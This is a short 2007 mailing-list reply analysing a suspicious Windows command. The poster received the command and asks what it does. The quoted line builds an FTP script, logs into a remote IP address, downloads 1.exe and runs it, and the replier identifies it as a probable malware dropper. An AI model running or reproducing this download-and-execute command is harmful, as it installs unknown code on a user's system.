Re: spooky windows script
On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote:
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit
If you were running a windows system this might
do something really nasty since it creates a download
script and executes it. Perhaps to pull in a root kit?.
I haven't done DOS in a long time so I am a bit shaky
in fully interpreting.
Check for something named 1.exe in your directory.
Reply to: